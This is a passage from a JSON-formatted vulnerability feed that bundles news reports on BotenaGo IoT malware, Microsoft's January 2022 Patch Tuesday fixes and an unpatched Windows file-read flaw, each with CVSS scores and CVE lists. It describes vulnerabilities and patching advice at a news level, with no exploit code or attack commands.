Caspi explained.\n\n\u201cFor example, if the malware is running locally on a virtual machine, a command can be sent through telnet,\u201d he wrote.\n\n## **Dangers to Corporate Network**\n\nGiven its ability to exploit devices connected over internet ports, BotenaGo can be potentially dangerous to corporate networks by gaining access through vulnerable devices, said one security professional.\n\n\u201cBad actors, such as those at work here, love to exploit these devices to gain access to the internal networks behind them, or just to use it as a platform from which to launch other attacks,\u201d observed Erich Kron, security awareness advocate at security firm [KnowBe4](<http://www.knowbe4.com/>), in an email to Threatpost.\n\nAttackers that can be launched once a hacker takes over a device and piggybacks on the network it\u2019s using include [DDoS attacks](<https://threatpost.com/ddos-attacks-records-q3/176082/>), which that can lead to extortion of money from victims, he said. Attackers also can host and spread malware using a victim\u2019s internet connection, Kron observed.\n\nGiven the number of vulnerabilities of which it can take advantage, BotenaGo also shows the importance of keeping IoT and routers updated with the latest firmware and patches to avoid leaving them available to exploit, he added.\n\n_**Want to win back control of the flimsy passwords standing between your network and the next cyberattack? Join Darren James, head of internal IT at Specops, and Roger Grimes, data-driven defense evangelist at KnowBe4, to find out how during a free, LIVE Threatpost event, **_[**\u201cPassword Reset: Claiming Control of Credentials to Stop Attacks,\u201d**](<https://bit.ly/3bBMX30>)_** on Wed., Nov. 17 at 2 p.m. ET. Sponsored by Specops.**_\n\n[**Register NOW**](<https://bit.ly/3bBMX30>)_** for the LIVE event and submit questions ahead of time to Threatpost\u2019s Becky Bracken at **_[**becky.bracken@threatpost.com**](<mailto:becky.bracken@threatpost.com>)_**.**_\n", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-12T13:14:44", "type": "threatpost", "title": "Millions of Routers, IoT Devices at Risk from BotenaGo Malware", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8958", "CVE-2021-0146", "CVE-2021-34484"], "modified": "2021-11-12T13:14:44", "id": "THREATPOST:95B32358658F5FEFA1715F69C5D6051D", "href": "https://threatpost.com/routers-iot-open-source-malware/176270/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-12T01:28:08", "description": "Microsoft has addressed a total of 97 security vulnerabilities in its January 2022 Patch Tuesday update \u2013 nine of them rated critical \u2013 including six that are listed as publicly known zero-days.\n\nThe fixes [cover a swath](<https://msrc.microsoft.com/update-guide/>) of the computing giant\u2019s portfolio, including: Microsoft Windows and Windows Components, Microsoft Edge (Chromium-based), Exchange Server, Microsoft Office and Office Components, SharePoint Server, .NET Framework, Microsoft Dynamics, Open-Source Software, Windows Hyper-V, Windows Defender, and Windows Remote Desktop Protocol (RDP).\n\n\u201cThis is an unusually large update for January,\u201d Dustin Childs, a researcher with Trend Micro\u2019s Zero Day Initiative (ZDI), explained. \u201cOver the last few years, the average number of patches released in January is about half this volume. We\u2019ll see if this volume continues throughout the year. It\u2019s certainly a change from the smaller releases that ended 2021 [Microsoft [patched 67 bugs](<https://threatpost.com/exploited-microsoft-zero-day-spoofing-malware/177045/>) in December].\u201d\n\n## **Zero-Day Tsunami**\n\nNone of the zero-days are listed as being actively exploited, though two (CVE-2022-21919 and CVE-2022-21836) have public exploit code available. They are:\n\n * [**CVE-2021-22947**](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-22947>): HackerOne-assigned CVE in open-source Curl library (RCE)\n * [**CVE-2021-36976**](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36976>): MITRE-assigned CVE in open-source Libarchive (RCE)\n * [**CVE-2022-21874**](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21874>): Local Windows Security Center API (RCE, CVSS score of 7.8)\n * [**CVE-2022-21919**](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21919>): Windows User Profile Service (privilege escalation, CVSS 7.0)\n * [**CVE-2022-21839**](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21839>): Windows Event Tracing Discretionary Access Control List (denial-of-service, CVSS 6.1).\n * [**CVE-2022-21836**](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21836>): Windows Certificate (spoofing, CVSS 7.8).\n\n\u201cThe [cURL bug] was actually disclosed by HackerOne back in September 2021,\u201d Childs said in ZDI\u2019s Patch Tuesday [analysis](<https://www.zerodayinitiative.com/blog/2022/1/11/the-january-2022-security-update-review>). \u201cThis patch includes the latest cURL libraries into Microsoft products. This is why this CVE is listed as publicly known. Similarly, the patch for the Libarchive library was also disclosed in 2021, and the latest version of this library is now being incorporated into Microsoft products.\u201d\n\n## **Patch Immediately: Critical, Wormable Bug**\n\nOut of the critical bugs, a remote code-execution (RCE) issue in the HTTP protocol stack stands out for researchers, given that it\u2019s wormable \u2013 i.e., an exploit could self-propagate through a network with no user interaction. It carries the most severe CVSS vulnerability-severity rating of the entire update, coming in at 9.8 on the 10-point scale.\n\nThe bug **([CVE-2022-21907](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21907>))** can be exploited by sending specially crafted packets to a system using the HTTP protocol stack (http.sys) to process packets.\n\n\u201cThe CVE targets the HTTP trailer support feature, which allows a sender to include additional fields in a message to supply metadata, by providing a specially-crafted message that can lead to remote code execution,\u201d Danny Kim, principal architect at Virsec, explained via email.\n\n\u201cNo user interaction, no privileges required and an elevated service add up to a wormable bug,\u201d Childs warned. \u201cWhile this is definitely more server-centric, remember that Windows clients can also run http.sys, so all affected versions are affected by this bug. Test and deploy this patch quickly.\u201d\n\nKim noted that CVE-2022-21907 is a particularly dangerous CVE because of its ability to allow for an attack to affect an entire intranet once the attack succeeds.\n\n\u201cThe CVE is the latest example of how software capabilities can be warped and weaponized,\u201d he noted. \u201cAlthough Microsoft has provided an official patch, this CVE is another reminder that software features allow opportunities for attackers to misuse functionalities for malicious acts.\u201d\n\n## **Other Critical Security Holes for January 2022 \u2013 One Unpatched**\n\nAnother interesting critical-rated RCE issue is **[CVE-2022-21840](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21840>)** in Microsoft Office, which, importantly, does not yet have a patch for Office 2019 for Mac and Microsoft Office LTSC for Mac 2021 (CVSS 8.8).\n\n\u201cMost Office-related RCE bugs are important-severity since they require user interaction and often have warning dialogs, too,\u201d said Childs, noting that the Preview Pane is not the attack vector. \u201cInstead, this bug is likely critical due to the lack of warning dialogs when opening a specially crafted file.\u201d\n\nMicrosoft also patched **[CVE-2022-21846](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21846>)** \u2013 a critical RCE bug in Microsoft Exchange Server reported by the National Security Agency, which is listed as \u201cexploitation more likely\u201d (CVSS 9.0). It\u2019s one of three Exchange RCEs being fixed this month (the others are CVE-2022-21969 and CVE-2022-21855), all of which are listed as being \u201cnetwork adjacent,\u201d meaning the attacker would need to be on a target network already to be successful.\n\nDespite the \u201cexploitation more likely\u201d rating, \u201cMicrosoft notes the attack vector is adjacent, meaning exploitation will require more legwork for an attacker, unlike the ProxyLogon and ProxyShell vulnerabilities which were remotely exploitable,\u201d Satnam Narang, staff research engineer at Tenable, said via email.\n\nOne of the zero-days is listed as critical too, it should be noted: **[CVE-2021-22947](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-22947>)**, which is the one found in the open-source cURL library used by Windows to transfer data using various network protocols. It allows RCE leading to man-in-the-middle (MiTM) attacks, according to Automox researcher Maarten Buis.\n\n\u201cAn attacker could carry out a MitM attack by exploiting how cURL handles cached or pipelined responses from IMAP, POP3, SMTP or FTP servers,\u201d he explained in [a Tuesday posting](<https://blog.automox.com/automox-experts-weigh-in-january-patch-tuesday-2022>). \u201cThe attacker would inject the fake response, then pass through the TLS traffic from the legitimate server and trick curl into sending the attackers\u2019 data back to the user as valid and authenticated.\u201d\n\nThe public disclosure significantly increases the chances of exploit, he warned.\n\nAnd, a privilege-escalation issue is unusually flagged as critical: **[CVE-2022-21857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21857>)** in Active Directory Domain Services (CVSS 8.8).\n\n\u201cThis patch fixes a bug that allowed attackers to elevate privileges across an Active Directory trust boundary under certain conditions,\u201d Childs said. \u201cMicrosoft deemed the flaw sufficient enough for a critical rating. This does require some level of privileges, so again, an insider or other attacker with a foothold in a network could use this for lateral movement and maintaining a presence within an enterprise.\u201d\n\nThere\u2019s another critical privilege-escalation issue, **[CVE-2022-21833](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21833>)** in the Virtual Machine IDE Drive (CVSS 7.8), but the complexity is marked high. According to Automox, to exploit it, a threat actor would need to gain access to an underprivileged account, such as through an unsecure user password or an account with minimal access controls, to expose this vulnerability.\n\nThus, \u201cseeing this bug in the wild would likely take quite a bit of work,\u201d Childs said.\n\nTwo critical issues in the DirectX Graphics Kernel carry a rating of 7.8 out of 10 on the CVSS vulnerability-severity scale and allow RCE: **[CVE-2022-21912](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21912>)** and **[CVE-2022-21898](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21898>)**.\n\nTo exploit these, viewing a specially crafted media file could result in code execution, and are likely present in most systems, according to Automox researcher Jay Goodman.\n\n\u201cThe DirectX graphics kernel is a subsystem that enables internal components like graphics cards and drives or external devices like printers and input devices,\u201d he said. \u201cAttackers could use these remote code execution vulnerabilities to deploy and execute code on a target system. This can allow attackers to easily take full control of the system as well as create a base of operations within the network to spread to other systems. Common and widespread vulnerabilities like these are critical for attackers trying to steal corporate data or infiltrating sensitive systems. It is important for organizations to patch and remediate within the 72 hour window to minimize exposure.\u201d\n\nAnd finally, there\u2019s **[CVE-2022-21917](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21917>)** in HEVC Video Extensions (RCE, CVSS 7.8).\n\n\u201cSuccessful exploitation would require an attacker to bait an authenticated user into opening a maliciously crafted media file, which would result in remote code execution on the victim\u2019s machine,\u201d explained Automox researcher Justin Knapp. \u201cMicrosoft does not provide mitigation recommendations aside from patching. However, most affected customers will automatically be updated via the Microsoft Store and guidance is provided to check the package version to ensure it has the current update.\u201d\n\nThe monster Patch Tuesday couldn\u2019t come at a worse time, noted Bharat Jogi, director of vulnerability and threat research at Qualys.\n\n\u201cThis massive Patch Tuesday comes during a time of chaos in the security industry whereby professionals are working overtime to remediate Log4Shell \u2013 reportedly the worst vulnerability seen in decades,\u201d he said via email. \u201cUnpredictable events such as Log4Shell add significant stress to the security professionals dealing with such outbreaks.\u201d\n\n**_Password_**_ _**_Reset: [On-Demand Event](<https://threatpost.com/webinars/password-reset-claiming-control-of-credentials-to-stop-attacks/>):_**_ Fortify 2022 with a password-security strategy built for today\u2019s threats. This [Threatpost Security Roundtable](<https://threatpost.com/webinars/password-reset-claiming-control-of-credentials-to-stop-attacks/>), built for infosec professionals, centers on enterprise credential management, the new password basics and mitigating post-credential breaches. Join Darren James, with Specops Software and Roger Grimes, defense evangelist at KnowBe4 and Threatpost host Becky Bracken. _**_[Register &amp; stream this FREE session today](<https://threatpost.com/webinars/password-reset-claiming-control-of-credentials-to-stop-attacks/>)_**_ \u2013 sponsored by Specops Software._\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-11T21:54:57", "type": "threatpost", "title": "Microsoft Faces Wormable, Critical RCE Bug & 6 Zero-Days", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22947", "CVE-2021-36976", "CVE-2022-21833", "CVE-2022-21836", "CVE-2022-21839", "CVE-2022-21840", "CVE-2022-21846", "CVE-2022-21855", "CVE-2022-21857", "CVE-2022-21874", "CVE-2022-21898", "CVE-2022-21907", "CVE-2022-21912", "CVE-2022-21917", "CVE-2022-21919", "CVE-2022-21969"], "modified": "2022-01-11T21:54:57", "id": "THREATPOST:05E04E358AB0AB9A5BF524854B34E49D", "href": "https://threatpost.com/microsoft-wormable-critical-rce-bug-zero-day/177564/", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "thn": [{"lastseen": "2022-05-09T12:37:52", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEiL_ZBAXmRadIpTCtIL6ko2RhRBQ3M8KOXg7jLdsxCjWl-V2Hk47PVfsYkcW-ZGiMl6CyhTYXcxIFCB3jWTn6ByqP9laZRQ3JiUFSBvb-fc_RWVEwQdJNgKNOxDwYPGv55yleW0ySMgaRuaksIn50zw3gG563opnN_wxTB8iSMcvhUeQ17KH-AY68rs>)\n\nUnofficial patches have been issued to remediate an improperly patched Windows security vulnerability that could allow information disclosure and local privilege escalation (LPE) on vulnerable systems.\n\nTracked as [CVE-2021-24084](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-24084>) (CVSS score: 5.5), the flaw concerns an information disclosure vulnerability in the Windows Mobile Device Management component that could enable an attacker to gain unauthorized file system access and read arbitrary files.\n\nSecurity researcher Abdelhamid Naceri was credited with discovering and reporting the bug in October 2020, prompting Microsoft to address the issue as part of its February 2021 Patch Tuesday updates.\n\nBut as [observed](<https://halove23.blogspot.com/2021/06/CVE-2021-24084-Unpatched-ID.html>) by Naceri in June 2021, not only could the patch be bypassed to achieve the same objective, the researcher this month found that the incompletely patched vulnerability could also be [exploited](<https://twitter.com/KLINIX5/status/1455500874596356098>) to gain administrator privileges and run malicious code on Windows 10 machines running the [latest security updates](<https://thehackernews.com/2021/11/microsoft-issues-patches-for-actively.html>).\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEgMZQpplV3ZiAcHEwmMtQcHAz3YyxyHAiW5jeWeu9T3hsQp50k-M3uoVMRHw8T9mtaGFHLoV6lAfluit3rHY6ojhU5kaukhNj_aHGxKMo2fteTd2XFcRIglOh3Ge34soXm23wwNDq0H_DeD786rYBCsEqBbia1jy1cBQSY3C7lv4NT8Ms-LiBp5S_UP>)\n\n\"Namely, as [HiveNightmare/SeriousSAM](<https://thehackernews.com/2021/07/new-windows-and-linux-flaws-give.html>) has taught us, an arbitrary file disclosure can be upgraded to local privilege escalation if you know which files to take and what to do with them,\" 0patch co-founder Mitja Kolsek [said](<https://blog.0patch.com/2021/11/micropatching-unpatched-local-privilege.html>) in a post last week.\n\nHowever, it's worth noting that the vulnerability can be exploited to accomplish privilege escalation only under specific circumstances, namely when the system protection feature is enabled on C: Drive and at least one local administrator account is set up on the computer.\n\nNeither Windows Servers nor systems running Windows 11 are affected by the vulnerability, but the following Windows 10 versions are impacted \u2014\n\n * Windows 10 v21H1 (32 &amp; 64 bit) updated with November 2021 Updates\n * Windows 10 v20H2 (32 &amp; 64 bit) updated with November 2021 Updates\n * Windows 10 v2004 (32 &amp; 64 bit) updated with November 2021 Updates\n * Windows 10 v1909 (32 &amp; 64 bit) updated with November 2021 Updates\n * Windows 10 v1903 (32 &amp; 64 bit) updated with November 2021 Updates\n * Windows 10 v1809 (32 &amp; 64 bit) updated with May 2021 Updates\n\nCVE-2021-24084 is also the third zero-day Windows vulnerability to rear its head again as a consequence of an incomplete patch issued by Microsoft. Earlier this month, 0patch [shipped](<https://blog.0patch.com/2021/11/micropatching-incompletely-patched.html>) unofficial fixes for a local privilege escalation vulnerability ([CVE-2021-34484](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34484>)) in the Windows User Profile Service that enables attackers to gain SYSTEM privileges.\n\nThen last week, Naceri disclosed details of another zero-day flaw in the Microsoft Windows Installer service ([CVE-2021-41379](<https://thehackernews.com/2021/11/warning-hackers-exploiting-new-windows.html>)) that could be bypassed to achieve elevated privileges on devices running the latest Windows versions, including Windows 10, Windows 11, and Windows Server 2022.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-30T09:11:00", "type": "thn", "title": "Unpatched Unauthorized File Read Vulnerability Affects Microsoft Windows OS", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24084", "CVE-2021-34484", "CVE-2021-41379"], "modified": "2021-12-03T03:42:06", "id": "THN:BABD510622DAA320F3F1F55EEDD7549A", "href": "https://thehackernews.com/2021/11/unpatched-unauthorized-file-read.html", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2022-05-09T12:37:43", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEjhBjNHjU-yR3MwrRHvUS9tDvlmZ8hZdIuBZLlTiLvekhf4svlWJy4OELJMXg06rTqKY-p4BvsU0T8jjJl6NFi3ByDa_8Bm2AEF0p-kQEfufx4DTJRrPfnWneln3r_fQXG0mtIGvUKcm_8SWaGbR_SFykKEZokaVBdGvVTWLiVQgnyK_Ae02rDLl0eF>)\n\nMicrosoft on Tuesday kicked off its first set of updates for 2022 by [plugging 96 security holes](<https://msrc.microsoft.com/update-guide/releaseNote/2022-Jan>) across its software ecosystem, while urging customers to prioritize patching for what it calls a critical \"wormable\" vulnerability.\n\nOf the 96 vulnerabilities, nine are rated Critical and 89 are rated Important in severity, with six zero-day publicly known at the time of the release. This is in addition to [29 issues](<https://docs.microsoft.com/en-us/deployedge/microsoft-edge-relnotes-security>) patched in Microsoft Edge on January 6, 2022. None of the disclosed bugs are listed as under attack.\n\nThe patches cover a swath of the computing giant's portfolio, including Microsoft Windows and Windows Components, Exchange Server, Microsoft Office and Office Components, SharePoint Server, .NET Framework, Microsoft Dynamics, Open-Source Software, Windows Hyper-V, Windows Defender, and Windows Remote Desktop Protocol (RDP).\n\nChief among them is [CVE-2022-21907](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21907>) (CVSS score: 9.8), a remote code execution vulnerability rooted in the HTTP Protocol Stack. \"In most situations, an unauthenticated attacker could send a specially crafted packet to a targeted server utilizing the HTTP Protocol Stack (http.sys) to process packets,\" Microsoft noted in its advisory.\n\nRussian security researcher Mikhail Medvedev has been credited with discovering and reporting the error, with the Redmond-based company stressing that it's wormable, meaning no user interaction is necessary to trigger and propagate the infection.\n\n\"Although Microsoft has provided an official patch, this CVE is another reminder that software features allow opportunities for attackers to misuse functionalities for malicious acts,\" Danny Kim, principal architect at Virsec, said.\n\nMicrosoft also resolved six zero-days as part of its Patch Tuesday update, two of which are an integration of third-party fixes concerning the open-source libraries curl and libarchive.\n\n * [CVE-2021-22947](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-22947>) (CVSS score: N/A) \u2013 Open-Source curl Remote Code Execution Vulnerability\n * [CVE-2021-36976](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36976>) (CVSS score: N/A) \u2013 Open-Source libarchive Remote Code Execution Vulnerability\n * [CVE-2022-21836](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21836>) (CVSS score: 7.8) \u2013 Windows Certificate Spoofing Vulnerability\n * [CVE-2022-21839](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21839>) (CVSS score: 6.1) \u2013 Windows Event Tracing Discretionary Access Control List Denial of Service Vulnerability\n * [CVE-2022-21874](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21874>) (CVSS score: 7.8) \u2013 Windows Security Center API Remote Code Execution Vulnerability\n * [CVE-2022-21919](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21919>) (CVSS score: 7.0) \u2013 Windows User Profile Service Elevation of Privilege Vulnerability\n\nAnother critical vulnerability of note concerns a remote code execution flaw ([CVE-2022-21849](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21849>), CVSS score: 9.8) in Windows Internet Key Exchange ([IKE](<https://en.wikipedia.org/wiki/Internet_Key_Exchange>)) version 2, which Microsoft said could be weaponized by a remote attacker to \"trigger multiple vulnerabilities without being authenticated.\"\n\nOn top of that, the patch also remediates a number of remote code execution flaws affecting Exchange Server, Microsoft Office ([CVE-2022-21840](<https://cve-2022-21840>)), SharePoint Server, RDP ([CVE-2022-21893](<https://www.cyberark.com/resources/threat-research-blog/attacking-rdp-from-inside>)), and Windows Resilient File System as well as privilege escalation vulnerabilities in Active Directory Domain Services, Windows Accounts Control, Windows Cleanup Manager, and Windows Kerberos, among others.\n\nIt's worth stressing that CVE-2022-21907 and the three shortcomings uncovered in [Exchange Server](<https://thehackernews.com/2021/03/microsoft-exchange-cyber-attack-what-do.html>) ([CVE-2022-21846](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21846>), [CVE-2022-21855](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21855>), and [CVE-2022-21969](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21969>), CVSS scores: 9.0) have all been labeled as \"exploitation more likely,\" necessitating that the patches are applied immediately to counter potential real-world attacks targeting the weaknesses. The U.S. National Security Agency (NSA) has been acknowledged for flagging CVE-2022-21846.\n\n\"This massive Patch Tuesday comes during a time of chaos in the security industry whereby professionals are working overtime to remediate [Log4Shell](<https://thehackernews.com/2022/01/microsoft-warns-of-continued-attacks.html>) \u2014 reportedly the worst vulnerability seen in decades,\" Bharat Jogi, director of vulnerability and threat Research at Qualys, said.\n\n\"Events such as Log4Shell [\u2026] bring to the forefront the importance of having an automated inventory of everything that is used by an organization in their environment,\" Jogi added, stating \"It is the need of the hour to automate deployment of patches for events with defined schedules (e.g., MSFT Patch Tuesday), so security professionals can focus energy to respond efficiently to unpredictable events that pose dastardly risk.\"\n\n### Software Patches from Other Vendors\n\nBesides Microsoft, security updates have also been released by other vendors to rectify several vulnerabilities, counting \u2014\n\n * [Adobe](<https://helpx.adobe.com/security.html>)\n * [Android](<https://source.android.com/security/bulletin/2022-01-01>)\n * [Cisco](<https://tools.cisco.com/security/center/publicationListing.x>)\n * [Citrix](<https://support.citrix.com/search/#/All%20Products?ct=Software%20Updates,Security%20Bulletins&searchText=&sortBy=Modified%20date&pageIndex=1>)\n * [Google Chrome](<https://thehackernews.com/2022/01/google-releases-new-chrome-update-to.html>)\n * [Juniper Networks](<https://kb.juniper.net/InfoCenter/index?page=content&channel=SECURITY_ADVISORIES>)\n * Linux distributions [Oracle Linux](<https://linux.oracle.com/ords/f?p=105:21>), [Red Hat](<https://access.redhat.com/security/security-updates/#/security-advisories?q=&p=2&sort=portal_publication_date%20desc&rows=10&portal_advisory_type=Security%20Advisory&documentKind=Errata>), and [SUSE](<https://lists.suse.com/pipermail/sle-security-updates/2022-January/thread.html>)\n * Mozilla [Firefox](<https://www.mozilla.org/en-US/security/advisories/mfsa2022-01/>), [Firefox ESR](<https://www.mozilla.org/en-US/security/advisories/mfsa2022-02>), and [Thunderbird](<https://www.mozilla.org/en-US/security/advisories/mfsa2022-03/>)\n * [Samba](<https://www.samba.org/samba/history/security.html>)\n * [SAP](<https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=596902035>)\n * [Schneider Electric](<https://www.se.com/ww/en/work/support/cybersecurity/security-notifications.jsp>)\n * [Siemens](<https://new.siemens.com/global/en/products/services/cert.html#SecurityPublications>)\n * [VMware](<https://thehackernews.com/2022/01/vmware-patches-important-bug-affecting.html>), and\n * [WordPress](<https://wordpress.org/news/2022/01/wordpress-5-8-3-security-release/>)\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-12T06:42:00", "type": "thn", "title": "First Patch Tuesday of 2022 Brings Fix for a Critical 'Wormable' Windows Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22947", "CVE-2021-36976", "CVE-2022-21836", "CVE-2022-21839", "CVE-2022-21840", "CVE-2022-21846", "CVE-2022-21849", "CVE-2022-21855", "CVE-2022-21874", "CVE-2022-21893", "CVE-2022-21907", "CVE-2022-21919", "CVE-2022-21969"], "modified": "2022-01-16T08:40:23", "id": "THN:00A15BC93C4697B74FA1D56130C0C35E", "href": "https://thehackernews.com/2022/01/first-patch-tuesday-of-2022-brings-fix.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "hivepro": [{"lastseen": "2022-03-30T07:42:21", "description": "For a detailed threat digest, download the pdf file here Published Vulnerabilities Interesting Vulnerabilities Active Threat Groups Targeted Countries Targeted Industries ATT&amp;CK TTPs 340 10 5 53 24 84 The fourth week of March 2022 witnessed the discovery of 340 vulnerabilities out of which 10 gained the attention of Threat Actors and security researchers worldwide. Among these 10, there was 1 which is undergoing reanalysis, and 2 were not present in the NVD at all. Hive Pro Threat Research Team has curated a list of 10 CVEs that require immediate action. Furthermore, we also observed five threat actor groups being highly active in the last week. The Lapsus$, a new extortion threat actor group had attacked popular organizations such as Brazilian Ministry of Health, NVIDIA, Samsung, Vodafone, Ubisoft, Octa, and Microsoft for data theft and destruction, was observed using the Redline info-stealer. Additionally, North Korean state hackers known as Lazarus group, was exploiting the zero-day vulnerability in Google Chrome&#x27;s web browser (CVE-2022-0609). AvosLocker is a Ransomware as a Service (RaaS) affiliate-based group that has targeted 50+ organizations is currently exploiting Proxy Shell vulnerabilities (CVE-2021-31206, CVE-2021-31207, CVE-2021-34523, CVE-2021-34473, CVE-2021-26855). The threat actor APT35 aka Magic Hound, an Iranian-backed threat group is exploiting the Proxy Shell vulnerabilities to attack organizations across the globe. Another South Korean APT group DarkHotel was targeting the hospitality industry in China. Common TTPs which could potentially be exploited by these threat actors or CVEs can be found in the detailed section below. Detailed Report: Interesting Vulnerabilities: Vendor CVEs Patch Link CVE-2021-34484 CVE-2022-21919 https://central.0patch.com/auth/login CVE-2022-0609* CVE-2022-1096* https://www.google.com/intl/en/chrome/?standalone=1 CVE-2021-31206 CVE-2021-31207 CVE-2021-34523 CVE-2021-34473 CVE-2021-26855 